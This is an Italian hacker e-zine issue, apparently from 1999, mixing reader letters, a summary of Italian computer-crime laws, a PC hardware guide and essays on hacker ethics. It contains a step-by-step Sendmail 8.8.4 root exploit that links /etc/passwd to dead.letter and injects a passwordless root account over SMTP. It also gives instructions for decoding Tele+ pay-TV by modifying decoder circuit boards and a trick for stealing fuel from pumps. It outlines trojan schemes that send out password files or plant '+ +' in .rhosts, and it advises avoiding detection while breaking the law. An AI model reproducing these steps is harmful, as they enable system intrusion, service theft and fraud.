che un MITOOOOOO! -I libretti dei CD dei Marilyn Manson (ce li avete, vero??? ;)) Alla prossima! Mr_Skull Falsit Falsit Realt falsificate Tutte in fila come spugne in attesa di assorbire le realt terziarie della vita -Brian Warner for the great members of @-,i''i',.,i''i',.,i''i',.,i''i',.,i''i',-@ | _ _ ____ _ | | | \ | | _____ _| __ )(_) ___ ___ | -+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+- : | |\ | __/\ V V /| |_) | | __|__ \ : | |_| \_|\___| \_/\_/ |____/|_|\___|___/ | @-,i''i',.,i''i',.,i''i',.,i''i',.,i''i',-@ Allora, escludendo tutte le possibili ammirazioni che potrei fare sulla vostra e-zine (n.r. uaaa maro' stu' zine e' propeto ruoss', con noto accento meridionale..) passiamo alle cose serie. vorrei iniziare a far parte del vostro gruppo :) Cero, si, si lo so che inquesto preciso momento dite "ma chi lo conosce a questo, quasi quasi ci spediamo un pacco bomba a casa e la facciamo finita". purtroppo per voi la cosa non e' cosi' semplice per due semplici motivi : 1) non sapete dove abito e 2) mi sono dimenticato di dirvi che sono superman (no, forse superman no) sono l'incredibile hulk (forse con la pancetta ci sono :) forse potrei essere Mac Gyver.. si', ho deciso, sono proprio lui. Sigla : papapa parapa paap parpapapra (mi pare faccia proprio cosi') Allora precisando due cose : 1) non e' che mi possa definire un vero hacker, ne' un craker, ne' un programmatore, ne' un phreaker, ne' un essere mitologico. Vabbe' allora che scrivi a fare, mi direte voi .. sono semplicemente un newbies :) non ho mai bucato il pentagono, ne' il norad, ne' il sito di mtv, comunque potrei avere le conoscenze per bucarli (almeno quello di mtv). Sto' pian piano assimilando le tecniche di hacking e di phreaking come Luke Skywalker quelle della forza jedi. Per quel che riguarda la programmazione, purtroppo, so solo il fortran, e forse l'anno prox parto con il matlab. non so a chi possa servire ma comunque... 2) potrei scrivere di cazzate e non (droga, alcool, anarky, bombe) il tutto mischiato a quello che so di hack e varie. fatemi sapere la mia e-mail is : hiceman@hotmail.com Per ora vedete se questo vi piace : | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ \--.|\ |\./| /|.--/ \--.|\ |\./| /|.--/ \ .\ |.| /. / _ -_^_^_^_- \ \\ // / -_^_^_^_- _ - -/_/_/- ^ ^ | ^ ^ -\_\_\- - ////////////////////////////////S_A_S_H_A\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ||||||||||||||||||||||||||||||||S_A_S_H_A||||||||||||||||||||||||||||||||||||||| \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S_A_S_H_A/////////////////////////////////////// Beh, di solito questi articoli iniziano con cose del tipo "sono stato contattato da ***** che ha contattato ***** e che mi ha chiamato. grazie ***** Io invece dovro' iniziare cosi' : nessuno mi ha contattato, nessuno ha contattato un'altro che poi mi ha contattato. sono (forse) su questa e-zine perche' ho scritto io. Grazie a me :) Salve sono Troy Mclure vi ricorderete di me in azioni hacker come "hackerando sotto la pioggia" oppure "hackerate il computer del soldato Ryan". Oggi parliamo dalle leggi italiane che ci interessano da vicino. Premetto che non studio giurisprudenza ma chimica :) Purtroppo ci sono delle cose che si devono sapere. Proprio come le leggi italiane. Hacker novelli come me sono presi da film hackers o wargames sanno che in america ad essere un hacker potresi quasi finire sulla sedia elettrica. Qui le cose sono un po diverse : anche perche' l'italia non ha tutte le risorse dell'america : avete mai visto voi una scuola collegata in rete, dove potete cambiare l'allarme antincendio? (hackers) oppure sapete dove cambiare il timer dei semafori? (sempre hackers). Comunque non e' che qui ci vadano molto piu' piano con le condanne. Per prima cosa una importantissimissimissima : PER IL CODICE CIVILE VIENI CONDANNATO PER QUALSIASI COSA CHE FAI :( PER IL CODICE PENALE SE COMMETTI UN CRIMINE CHE NON HA UNA LEGGE PENALE, NON TI POSSONO CONDANNARE :) Cio' implica che prima di fare qualsiasi cosa vedete se c'e' la legge apposita, se c'e' fatelo senza farvi beccare, se non ci dovesse essere la legge.... chiamatemi, verro a farlo con voi(qualsiasi cosa dovrete fare :) Vediamo le leggi : c.p legge 420 l'arresto in fragranza e' obbligatorio (se non vi colgono sul fatto potete sempre fare finta di niente.) il fermo e' cosentito la competenza e' del tribunale si procede d'ufficio Attentato a impianti di pubblica utilita'. Chiunque commette un fatto diretto a danneggiare o distruggere impianti di pubblica utilita', e' punito, salvo che il fatto costituisca piu' grave reato, con la reclusine da uno a quattro anni. La pena si applica anche a chi commette un fatto diretto a danneggiare o distruggere un sistema informatico o telematico di pubblica utilita', ovvero dati, informazioni o programmi in esso contenuti o ad essi pertinenti. P.S = potete anche svotargli il cestino per fargli un favore e vi beccate la gabbia ----------------------------------------------------------------------------- c.p 615 l'arresto in fragranza e' facoltativo il fermo non e' consentito (potete anche emigrare alle haway) la competenza e' del pretore si procede con querela e poi d'ufficio Accesso abusivo ad un sistema informatico o telematico. chiunque abusivamente si introduce in un sistema informatico o telematico protetto da misure di sicurezza, ovvero vi si mantiene contro la volonta' espressa o tacita di chi ha il diritto di escluderlo, e' punito con la reclusione fino a tre anni. la pena della reclusione e' da uno a cinque anni : 1)se il fatto e' commesso da un pubblico ufficiale o da un incaricato di un pubblico servizio, con abuso di poteri o con violazione dei doveri inerenti alla funzione o al servizio , o da chi esercita anche abusivamente la professione di investigatore privato, o con l'abuso della qualita' di operatore di sistema; 2)se il colpevole per commettere il fatto usa violenza sulle cose o alle persone; 3)se dal fatto deriva la distruzione o il danneggiamento del sistema o l'interruzione totale o parziale del suo funzionamento; Qualora i fatti riguardino sistemi informatici o telematici di interesse militare o relativi all'ordine pubblico o alla sanita' o alla protezione civile la pena e' da tre a otto anni. ----------------------------------------------------------------------------- c.p 615-4 Detenzione e diffusione abusiva di codici di accesso a sistemi informatici o telematici. Chiunque al fine di procurare a se' o ad altri un profitto o di arrecare ad altri un danno, abusivamente si procura, riproduce, diffonde, comunica o consegna codici, parole chiave o altri mezzi idonei all'accesso ad un sistema informatico o telematico protetto da misure di sicurezza, o comunque fornisce indicazioni o istruzioni idonee al predetto scopo, e' punito con la reclusione sino a un anno e con una multa sino a lire dieci milioni. ----------------------------------------------------------------------------- c.p 615-6 Diffusione di programmi diretti a danneggiare o interrompere un sistema informatico. Chiunque diffonde, comunica o consegna un programma informatico da lui stesso o da altri redatto, avente per scopo o per effetto il danneggiamento di un sistema informatico o telematico, dei dati o dei programmi in esso contenuti o ad esso pertinenti e' punito con la reclusione sino a due anni e con una multa sino a lire venti milioni. ----------------------------------------------------------------------------- c.p 617-4 Intercettazione, impedimento o interruzione illecitadi comunicazioni informatiche o telematiche Chiunque fraudolentemente intercetta comunicazioni relative a un sistema informatico o telematico o intercorrenti tra piu' sistemi, ovvero le impedisce o le interrompe, e' punito con la reclusioneda sei mesi a quattro anni. ----------------------------------------------------------------------------- Beh, queste sicuramente non sono tutte ma sono quelle che io ho ritenuto piu' importanti. A vederci ad una prossima volta, newbies favorevoli. S_A_S_H_A Mi potete trovare su #ahccc Mi potete scrivere a hiceman@hotmail.com ͻ Ŀ GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z ٺ ͼ DISKLAIMER:io Devil_666 non mi prendo nessuna responsabilita' per eventuali danni che potreste causare al vostro pc seguendo cio' che viene detto in questa guida....insomma + o - e' kosi' no ??!! 1a PUNTATA: Montaggio di RAM & PERIFERICHE Che dite ??!! No non vi ho preso per deficenti :) lo so benissimo che ram e schede varie ve le sapete montare anke da soli......ma sapete kom e'... bisogna iniziare da qualcosa di facile ;D <><>RAM<><> Allora, il primo problema per la ram e' l'acquisto: infatti esistono molti tipi di ram ed ovviamente ce n'e' solo un tipo che funzia sul nostro picci', quindi vediamo un po' che ka>>o di ram dobbiamo rubare...ehm.....volvevo dire komprare per la nostra macchina. La prima distinizione e' fra SIMM e DIMM...le prime sono quelle un po' + vecchie ormai poko prodotte ma ugualmente usate sui picci' un po' + vecchi, mentre le seconde sono usate a partire generalmente da pentium 200... Kome riconoscerle??? E'facile...le simm sono + corte ed hanno solo 72 pin (contatti va meglio ?? ;D) mentre le dimm sono + lunghe ed hanno 168 pin. Aprendo il picci' le potete rikonoscere xche' le simm hanno i morsetti che le tengono il ferro, memtre le dimm in plastika. Questa era la prima distinzio ne...poi all'interno delle dimm c'e' da distinguere fra ram a 100 mhz e dimm normali. Quelle a 100 mhz vengono usate su schede madri che hanno un clock di 100 o + mhz e sono le + veloci in assoluto le altre dimm servono x le altre motherboard. Se komprate dimm da 100 mhz e le montate su una scheda madre con clock inferiore ai 100 mhz tutto vi funzionera' ugualmente ma la spesa sara' + alta; questo puo' essere conveniente se avete in previsione di sostituire anke la scheda madre......cosi' quando lo farete avrete gia' le ram adatte al nuovo hadware (parolone eh?). Ora che vi ho spiegato un po' kome scegliere le ram adatte al vostro picci' vi diko kome montarle (lo so che e' una ka<<>PERIFERICHE VARIE<><> Il mantaggio di schede varie tipo audio video ecc.......e' ankora + facile di quello delle ram. L'unika cosa alla quale bisogna stare attenti e' all'acquisto di una scheda che il nostro picci' possa accettare (non vi sto a dire che ve ne fate di una scheda video agp 4x quando il vostro picci' e' un katamarano che ha x miracolo i supporti x le pci.........:D) cmq sikuramente lo sapevate gia'....=). Allora, una volta acquistata la scheda, non resta altro che rimuovere lo sportelletto in metallo dietro il picci' in korrispondenza dello slot nel quale si vuole montare la nostra scheda, inserire la scheda nello slot e fissarla kon la vitina apposita. Poi si puo' rikiudere il kase e dopo aver kollegato i kavi appositi alla nostra nuova periferica si possono installare i driver necessari al suo funzionamento ed il gioco e' fatto. Ca< Devil_666 Consiglio: mentre qualunque domanda ed elogio e' ben accetto, per critiche ed offese usate un server smtp e non la vostra kasella e-mail altrimente verrete mailbombati pesantemente...;D...Eddai scherzo (forse). Si, ora che ho detto tutte le ka<--- Ciao nObody88, complimenti per la rivista. Sono un ragazzo al quale e' passato per le mani un articolo molto bello stile Manifesto hacker, che pero' denuncia anche i veri pirati informatici e mette in luce vari aspetti interessanti. E' un documento non molto lungo, quindi se ti piace potresti anche inserirlo nel tuo prossimo (speriamo che ce ne sia) numero di Newbies. Il nome di quello che l'ha scritto e' Carnifex, un nome che non ho mai sentito ne' letto in alcun posto, quindi dovrebbe essere uno nuovo. In allegato ti mando il file txt. Ciao, Emanuele ------ PAURA ? Non aver paura degli hacker quando ti parlano di crimini informatici, ne' quando ti dicono che uno e' riuscito ad entrare nella tua banca, e solo per fortuna non ha scombinato anche il tuo conto; non aver paura dell'hacker se temi il dilagare della pirateria informatica o se tremi al sol pensiero che uno di loro si e' preso gioco della N.A.S.A. rubando un satellite con il computer. Non aver paura di loro come hacker perche' loro, in realta', hacker non sono. C'e' forse un po' di ignoranza nella gente, e forse e' un ignoranza indotta, da coloro che nell'hacker vedono un pericolo, un nemico, un avanzo di galera. Indotta forse da chi non riesce a prendersela che con gli hacker, ma loro, vedete, non sono cosi'. Quelli che chiamate genericamente hacker sono individui di diverse categorie, che hanno a che fare con gli hacker solo per le conoscenze che hanno, poi ognuno le mette in pratica come vuole: gli hacker entrando nei sistemi informatici al solo scopo di capire come funzionano, e i cracker, i pirati informatici, i lamer entrando nei sistemi informatici al solo scopo di distruggerli o trarne vantaggi personali. Qui e' la differenza. E non continuate a trattare gli hacker come criminali, e non continuate ad aver paura di loro, e non chiamate la polizia se un giorno un tizio bussa alla vostra porta e dice: - Sono un hacker. (Mi rimangio l'ultima frase: un hacker non lo direbbe mai, se non altro perche' un hacker non ammetterebbe di essere un hacker solo per vantarsi o per far vedere che e' qualcuno) Che dici? Ancora paura? Paura, ma non piu' degli hacker. Lo scenario e' lo stesso: gli hacker si sono salvati il culo, ora la colpa di tutto ricadra' sui pirati informatici, loro ormai sono puliti...ma cosa cambia in realta'? Dopo tutto questo ambarada'n, a che conclusione si e' giunti? Per il pover'uomo di provincia, per la massaia, per il direttore di banca, per il ragazzo che bestemmia perche' il prezzo dei CD e' troppo alto, tutto e' come prima, cambiera' solo il nome contro cui inveiranno all'unisono: non ci sara' piu' un bastardo hacker, ma invece un bastardo fuorilegge telematico. Per tutta questa gente il problema resta...che si puo' fare, allora? Come si puo' ovviare a tutto cio'? Esiste un modo...un modo che eliminerebbe i pregiudizi sugli hacker e falcerebbe la strada ai pirati. Infatti le sole persone che riuscirebbero a colpire al cuore tutti i malviventi nella Rete sarebbero chi conosce la loro vita, chi conosce i loro punti di forza e i loro punti deboli, chi sa che cosa fare e quando farla. Chi come loro sa ma a differenza di loro non fa. E chi, se non gli hacker? Essi, in nome di una dignita' che e' stata loro tolta, dovrebbero unirsi per fare a pezzi tutti coloro che con l'illegalita' sulla Rete ci vivono, coloro che rovinano il duro lavoro altrui. Perche' non farlo? I problemi sarebbero presto risolti, e vero e' che alcuni gruppi di hacker si stanno gia' battendo per far diventare Internet un "posto" piu' sicuro, piu' piacevole e adatto a tutti, disgregando ad esempio le associazioni di pedofili. E tu, banchiere, la cui vita dipende dall'integrita' di alcuni computer, hai ancora paura degli hacker? (by Carnifex-giugno 1999) ͻ Ŀ RENDIAMOCI ANONIMI ٺ ͼ Anonimita' un Sacro diritto di ogni persona cerca un poko di privacy per fare gli affari suoi nella rete. Io credo che l'anonimita' tolale nella rete non esista ... kome e'successo anke ai migliori competenti sysadmin , associazioni e corporazioni hanno saputo rintracciare anke il log piu' remoto.... Cmq cerchiamo di nasconderci un poko nella rete cosi' per avere la nostra privacy.. Allora idee che mi sono venute in mente [o meglio una struttura alquanto sicura per nascondersi] chiamiamo il nostro caro provider con account di altri ovviamente e colleghiamoci poi entriamo nella nostra shell preferita e da essa colleghiamoci col caro comando dial alla notra bbs preferica collegata alla rete ora siamo un poko + anonimi e ci sentiamo molto meglio hehehe. idee sono ben accette su ste 4 cose che detto ZeroCool ͻ Ŀ IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! ٺ ͼ Va beeeeeneeeee...allora le dediche e le contro dediche...come sempre.... Thi$ 4rT is DeD 2 : lo spagnolo che sulla spiaggia mi ha kiesto di fargli una foto !!! P.S. Anche alla figlia dello spagnolo....a cui avrei volentieri fatto qualkosa che la sua nazionalita' suggerisce...vabbe' Thi5 aRt is Vs-d3d To : Dante Alighieri che come lo stronzo al suo "grazias" ha risposto con un "prego" invece del suo solito "de nada" Bhe..ora vi parlo del mio exploit preferiiiiiitoooooo...troppo BeLLo !!!!!! Beh..penso sappiate tutti qual'e' il + bacato dei programmi.. se non lo sapete questo bellissimo programmino e' il SendMail..programma di posta elettronica tra i + usati. Bene in questo articolo vi parlero' dell'exploit per guadagnare privilegi da root su di un sistema avente caricato questo programma nella sua versione 8.8.4 dehihohuuuu...miticooooo!!! Per usufruire dell'exploit avrete bisogno di avere gia' un altro account...se no vi sparate le pippette...sigh. Allora avete l'account...e telnettandovi al server sulla porta 25 scoprite che il suo sendmail e' nella versione 8.8.4...benissimo... siete a CavaLLuccio marino !!! cosa fare ora ??? Entrate nel server telnettandovi col vostro account, e date il comando ln /etc/passwd /var/tmp/dead.letter a cosa serve ???...boh?!?!...scherzo...ora ve lo spiego... avete semplicemente linkato il file dove vanno a finire le lettere perse al file di pass....a cosa ci e' servito ??? Bene...quello che vi sara' scritto in ogni e-mail andata persa verra' trascritto nel file passwd. A che pippozza mi serve ???..ora ve lo spiego...aspettate e vedrete!!! telnettatevi sulla 25 ed impartite i seguenti comandi: mail from: che@godo.com rcpt to: questo@exploit.com data homer::0:0:ihih ohoh:/root:/bin/bash . quit Avrete cercato di mandare una lettera ad una casella che si chiama questo@exploit.com....ovviamente non esiste!!!! Allora il sistema che fa ??? prende il contenuto dell'e-mail (homer::0:0:ihih ohoh:/root:/bin/bash) e la aggiunge al passwd...vi sarete cosi' creati un account da root con login homer e senza alcuna pass. + facile di cosi' si muore !!!! Ciao BeLLi....e alla prossiminaaaaaaa !!! Ciaoooooooooo bye bye Dante Alighieri...NeWBiEs StaFf... 08V|0U5 : 54|NT 59|R|T5 !!!! ͻ Ŀ TELEPIU' TERRESTRE: INFO VARIE ٺ ͼ CONSUMO: un sorso di Johnny Walker e un decoder t+ stravolto dai miei inutili sperimenti MUSICA ASCOLTATA: Sigle dei cartoni animati rifatte da "Gli amici di Roland" in versione Rockeggiante Allora oggi mi sono alzato di buon umore, anche se fa un caldo boia e sto schiattando dell'afa. Ho deciso di scrivere questo articolo per mettere in chiaro quattro cosette riguardo le radio-televisioni private codificate in particolare di t+. Inizio col dire che non so se le cose che mi appresto a scrivere siano legali o meno ma non penso che faccia molta differenza. L'emittente telepiu' trasmette sia via satellite sia tramite il classico decoder terrestre. In questo articolo approfondiro' le tecniche di decriptaggio tramite decoder terrestre. Pronti . .. . via! T+ trasmette il proprio segnale (Audio e Video) tramite un sistema di crittografia IRDETO che e' l'azienda che ha elaborato e introdotto i decoders Comcrypt e Cablecrypt. Tutte le info che troverete in questo articolo funziona non solo con t+ ma anche con le altre emittenti (straniere) che utilizzano la stessa tecnologia. Questo sistema di codifica di immagini e suoni nasce in due momenti separati: per quanto riguarda l'audio il sistema di crittografia nasce nei primi anni 80 quando ancora non si utilizzava la crittografia per la televisione e contemporaneamente alla nascita di Videocrypt e Eurocrypt. Ma come funziona l'algoritmo di codifica Audio Video?? La questione, dal punto di vista teorico, non e' per niente difficile. Innanzitutto una premessa rapida: la Tv di casa nostra, per ricevere e visualizzare correttamente i segnali trasmessi hanno bisogno di essere sincronizzati. Senza una sincronizzazione verticale e orizzontale i singoli punti del fotogramma non troverebbero una posizione precisa e l'immagine risulterebbe in continuo movimento per lo schermo. Una delle cose che fa l'encoder (Non il decoder) e' questa: distorcere l'immagine. Altra cosa che fa l'encoder e' quella di cambiare polarita' dell'immagine in ordine pressoche' casuale (il colore bianco diventa nero e cosi' via . . .). La funzione del decoder e' appunto sapere come le immagini sono distorte e polarizzate in modo da saperle ricostruire rapidamente. Come dicevo prima questo sistema di criptaggio del segnale video e' abbastanza vecchiotto ma ancora largamente utilizzato. Tuttavia questo metodo e' totalmente insicuro e cosi' decriptare il segnale video e' molto semplice. (non correte bei fiuliti . . continuate a leggere . . ahahaeheheha) Per quanto riguarda l'audio il discorso e' completamente diverso. Per le mie conoscenze poco tecniche posso sicuramente dirvi che non esiste alcun modo per ricevere l'audio modificando il proprio decoder terrestre. Si' puo' utilizzare una scheda Tv conessa al picci' ma non conosco metodi di modifica dei decoders. Per quanto riguarda le informazioni tecniche su tutti i tipi di decoders e sugli algoritmi di criptaggio audio video vi rimando al sito Republic che purtroppo non trovo piu' (cercate "Republic cablecrypt " e troverete cio' che cercate. In questo sito c'e' una bellissima guida tecnica (arrivata alla seconda edizione) che tratta in modo quasi scientifico la tecnologia Irdeto. E ORA . . . . . rulli di tamburo. . . .. . . . . . . piu' forte . . . . . . .. . . .. . . .un po' meno . . . . . . . . OK! Come decriptare TeLePIU' - - - - due metodi facili facili - - - - Questi metodi sono tutti seri. Non sono semplci voci di corridio. Sta roba funziona. ATTENZIONE: esistono sicuramente metodi piu' scientifici per decriptare telepiu' terrestre. Un anno fa circa ho conosciuto un tipo che per L. 250.000 mi vendeva un kit (che ho visto funzionare) che permetteva di decriptare telepiu'. Visto che i componenti erano abbastanza economici e il lavoro era fattibilissimo ho deciso di cercare ancora per Internet questi benedetti schemi ma non li ho mai trovati. ( Chiunque voglia mettersi in contatto con me: JohnnyRunner@usa.net in chat su #hackernow o #linux) METODO 1) Questo metodo e' l'unico che io conosca che permette di vedere e sentire tele+. Funziona solo su modelli ComCrypt 4000 prima serie cioe' comprati fra il dicembre '95 e il luglio '96. Molti di questi decoders sono poi stati ritirati e revisionati . . . . (porca tr**a!) Ecco la procedura: - sintonizzate sul 1mo canale la frequenza di Telepiu' (se il decoder non e' attivo apparira' E3o E0 ) - scollegate l'antenna - premete il tasto - per tornare indietro con i canali ( apparira' la scritta rr) - ricollegate l'antenna - godetevi il film o la partita Per cambiare da +1 a +2 va eseguita la stessa procedura" Questo funziona solo con alcuni decoder siglati ComCrypt 4000. Non pensate di comprare un decoder apposta per provare: moltissimi decoder sono stati ritirati e riprogrammati per correggere 'sto bug (ovviamente il mio e' uno di quelli che non funziona). Almeno dieci persone mi hanno detto pero' che funzioni (sul decoder giusto). Se avete un decoder in cantina a prendere polvere potete sempre provare! METODO 2) Questo metodo consiste nel fottere il segnale video criptato. Conosco la procedura solo per i decoders CableCrypt. Non e' applicabile (almeno: io non ci sono riuscito) sui decoder Comcrypt 4000 (sara' per "par condicio"????) Ecco come fare: 1. Smontate il decoder fino a quando riuscite ad estrarre il circuito stampato del decoder. Ora localizzate sul decoder un integrato grosso siglato delta 5.x (o comunque l'unico integrato a 40 pin presente nel circuito) Dalla parte delle saldature vi troverete qualcosa del genere: 40 21 --------------------------- ] | --------------------------- 1 20 - Localizza il pin 18 dell'integrato IC503 (o simile) e gratta via con un taglierino o un coltello il rame della pista da entrambe le parti. - Localizza il pin 23 dell'integrato IC503 (o simile) e gratta via il rame sulla sinistra (questo dalla parte del microcontroller: insomma . . . rigirate il tutto) - Localizza il pin 32 e 33 e gratta via il rame da entrambi i lati. - Localizza il pin 23 (si' quello di prima) e saldaci un filo, poi collegalo al ground (puoi usare lo spazio vuoto del J835, guarda il lato componenti). (traduzione del testo di Peter "The Video Ripper" disponibile sul sito di Republic) Non vorrei aver sbagliato . . . ca**o! Be' ecco la versione in lingua . . - Be sure that all the metal tops are removed from the processor-box. - Locate pin 18 of IC503 and scratch away the copper on both sides. - Locate pin 23 of IC503 and scratch away the copper on the left, this is the side of the micro-controller. - Locate pins 32 and 33 and scratch away the copper at both. - Locate pin 23 again and place a piece of solid core wire between pin 23 and ground (you can use the empty space of J835, see component side). Io ho un ComCrypt 4000 e non ci sono riuscito . . sigh sigh . . . Comunque quelli di Republic mi sembrano tipi seri e disponibili. Provate su un modello CableCrypt (dovrebbero essere i primi modelli usciti) e probabilmente avrete piu' fortuna di me. Ahhh! ho trovato un indirizzo! Dovrebbe essere l'home page di Peter "The Video Ripper" ecco qua: http://home.pi.net/~pluijer (non so se funziona ancora) Be' l'articolo sta per finire. Chiunque voglia scrivermi la mia mailbox: JohnnyRunner@usa.net Se qualcuno ha info serie sulla Tv via satellite (non solo t+) e terrestre si faccia sentire!! Tanti saluti e baci. JohnnyRunner "Il mio futuro e' nel passato e nel presente" Litfiba BENZINA A GO G0! oVvEro devo fare benzina ma non ho soldi... Se per caso dovesse capitarvi di trovarvi con la macchina o con la moto senza benza e con poche migliaia di lire potete provare il seguente "trucchetto" ai distributori automatici. Dopo aver aperto il bocchetto della macchina (o moto) dove si inserisce la benzina, prendete la pompa e tenendo premuta la leva per farla scorrere, saltateci sopra ripetutamente ed energicamente. Con un po' di pazienza pian piano farete benzina grazie alla pressione che si viene a creare saltando sulla pompa (un mio amico, con una vecchia pompa, si fatto il pieno di benzina dello scooter in circa 15 minuti!!!). Con i tipi di pompe che hanno il cassettino che raccoglie la benzina posto sopra (come il disegno di seguito) sono quelle da cui si puo' attingere piu' benzina dato che scende direttamente dall'alto. .-------------. []]]]]]]]]]| lire 88888 | [] | litri 88888 | [] .----------.--| [] | | [] | | [] | | [] | | ||__ | | ||_'| .------------.--| || / |-| |-| |-| | () | | | | | | | | () | |_| |_| |_| | | | .----------------. Occhio pero' a non farvi prendere per pazzi da chi passa dato che vi vedra' saltare come dei dannati! ;-) HarLoK Spazio saluti: tutti quelli che mi conoscono, la mia compagnia nonche' quella di sballo e i soliti Blinking, 3ph4Throx! Terror Keeper, Lord Of Destruction, Dante Alighieri, Nobody88, la Spaghetti Phreakers crew, Rigor Mortem, Devilnet, N0SF3RATU, CDP, Blum, compresi tutti gli altri) K-> ͻ Ŀ BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI ٺ ͼ Ciao a tutti io mi kiamo KarmAYogA e, come avrete capito ho scelto questo nick proprio xche' nella mia vita ogni cosa anke la piu' piccola cerco sempre di farla al massimo delle possibilita' e non metto mai un limite al possibile dato che come diceva qualcuno "Non credevo che era impossibile quando lo feci!!!". Andro' a scrivere questo breve articolo che spero sia utile a piu' gente possibile e se volete contattarmi scrivete a N0body88 che mi girera' tutte le decine di mail che ricevero' =) Questo tipo di attacchi, detta data driven, sono molto difficili da individuare a causa delle loro modalita' ed i vari firewall servono a ben poco contro questo tipo di attacchi. Faro' adesso una breve lista di esempi x definire meglio questa modalita' x attaccare che si basa piu' sul social engineering e sulla speranza che l'utente "bersagliato" sia ignorante, che non sul fatto di usare strane o nuove tecniche x sperimentare l'effettiva sicurezza di alcuni sistemi. Esempio numero 1: |__|> l'hacker / newbies si prepara un file pdf o postscript da usare x eseguire cose non molto belle sul pc dei poveri utenti creduloni. |__|> l'hacker / newbies manda una email ad un utente con, come attachment, un file postscript che sembra essere normale ma che invece andra' ad eseguire operazioni sui file senza che l'user se ne accorga. |__|> l'user, ignaro di tutto, eseguira' subito il file postscript. |__|> l'interprete postscript esegue le operazioni contenute nel file che aggiungono la voce "+ +" nel file .rhosts dello user. |__|> l'hacker / newbies esegue un rlogin sulla macchina dell'utente. Esempio numero 2: |__|> un utente scarica da un sito HTTP un file eseguibile. |__|> l'utente esegue il file sul proprio pc. |__|> il programma cancella tutti i file contenuti sulla macchina dell'utente oppure compie solamente delle operazioni malicious e manda x esempio una mail all'hacker/newbies contenente le password dell'ignaro utente. |__|> il programma immette un virus all'interno della macchina dell'utente se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un lamer e lamer rimarra' finche non cambia filosofia. Esempio numero 3: |__|> un utente scarica da un sito FTP un file eseguibile |__|> l'utente esegue il file sul proprio pc. |__|> il programma cancella tutti i file contenuti sulla macchina dell'utente oppure compie solamente delle operazioni malicious e manda x esempio una mail all'hacker/newbies contenente le password dell'ignaro utente. |__|> il programma immette un virus all'interno della macchina dell'utente se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un lamer e lamer rimarra' finche non cambia filosofia. Esempio numero 4: |__|> questa cosa si vede moooolto spesso... su IRC qualcuno dice ad uno nuovo e un po' inesperto come ottenere un programma che: 1) lo aiutera' ad usare meglio il sistema oppure 2) lo fara' diventare un hacker in pochi secondi o 3) lo aiutera' a buttare giu0 chiunque in poki sec (tipo nuke) |__|> l'utente quindi attirato dalla proposta fatt si fara' passare il programma (con grn gioia del lamer) e lo eseguira' |__|> il programma cancellera' tutti file dello user e inviera' per email una copia del file delle password all'intruso (/etc/shadow o /etc/passwd) oppure si installera' nel sistema sotto forma di sniffer, x raccogliere password, sotto forma di trojan x aprire una porta, sotto forma di Esempio numero 5: |__|> in una pagina Web vi e' un bottone che dice "cliccare qui per infettare una macchina" (esiste veramente!) Questo e' il piu' stupido ma quant'e' vero iddio che esist ci posso mettere la mano sul fuoco xche' l'ho visto io su geocities ma adesso non c'e' piu' dato che andando giu' di brute force ho trovato la pass ho cancellato virus e pagine web e ho cambiato la pass...ognuno aiuta gli altri a modo suo ;) Byez Byex Byey KarmA_YogA "Cosa usi x hackare? io??? Uso la testa !!!!!!!!" Webmaster e Sysadmin of www.nonvelodico.it ------------------------------------------------------------------- MP3 in auto: Fantasie oltre la realta' ------------------------------------------------------------------- INGREDIENTI: un pc 486 da rottame e una scheda audio 16 bitz TEMPO PREVISTO: uggioso Eila' . .. tutto K? In questo articolo vorrei parlare di mp3: come portarli comodamente (?) in auto. Ormai tutti sanno che cosa sono gli Mp3, che software usare, tricchetracche . . OK. Frequentando un po' il newsgroup it.hobby.elettronica ho visto che qualcuno ha gia' messo un Pc in auto (collegato all'autoradio) per ascoltare Tanta musica ad alta qualita'. L'URL di questo studente di elettronica e' __________________ (mi raccomando . . . e' da visitare). In pratica in questo sito si vede il progetto di questo ragazzo (di cui non ricordo il nome) che e' riuscito a a mettere un Pentium in auto alimentandolo con un inverter 12/220. Per quanto riguarda i comandi e' stata adattata una tastiera ricavata da un laptop che e' stata collocata nelle vicinanze dello specchietto retrovisore. La sera stessa in cui ho dato un'occhiata al suo sito ho dormito poco esaltato da questo fantastico progetto. Ho pensato che, tutto sommato, occorre spendere non pochi soldi. Innanzitutto un Pc Pentium (anche 133, ma un pentium), poi un circuito inverter per elevare la tensione da 12 V in continua a 220 V in alternata necessaria al pc per funzionare correttamente. In questo articolo mi piacerebbe "fantasticare" un po' su come risparmiare un po' di soldi e avere ugualmente un buon impianto Mp3 in auto. Ecco quanto. LE TENSIONI Facendo 4 conti un inverter costa + o - L. 180.000 (azzz. . ..) e , a mia opinione, non e' molto conveniente. Certo che e' comodo, ma non costa poco e non consuma poco. Ecco lo schema delle tensioni AUTO | PC |scheda madre ================= 12V ------------------> 220V ------------------> | +5,-5,+12,-12 | CC CA ======= CC ====== INVERTER ALIMENTATORE sw (CA= corrente alternata; CC=corrente continua) In pratica, utilizzando un inverter, si passerebbe per i 220V canonici senza trarne alcun profitto. Se solo si riuscisse a ottenere i voltaggi appositi (+5,-5,+12,-12) si potrebbe ottenere un risparmio notevole di spazio levando l'alimentatore del PC. Inoltre il consumo di tutto l'impianto si ridurrebbe drasticamente. Per ottenere i voltaggi +5 e +12 non ci sono problemi, per quanto riguarda il -5 non ci dovrebbero essere gravi problemi: ma per -12????? (Ahhh!! Dimenticavo! +5,-5,+12,-12 V sono le tensioni necessarie alla scheda madre per alimentare tutte le periferiche del PC) Evitando di collegare le tensioni negative (-5 e -12 V) sicuramente il computer dovrebbe essere in grado di fare il boot, visto che l'Hdd utilizza solo la +12. Il problema + grande e' che la scheda audio non funzionerebbe correttamente riproducendo un suono in mono oppure, nei casi piu' cronici, non funzionando del tutto. Un'altra cosa che mi incuriosisce riguardo l'inverter e' il consumo di questo circuito. Quando ho visto il progetto di ________ mi sono accorto che tutto l'impianto MP3 era alloggiato in una Jeep (diesel) e quindi penso che lui non abbia avuto particolari problemi di alimentazione. Ma ve l'immaginate tutto 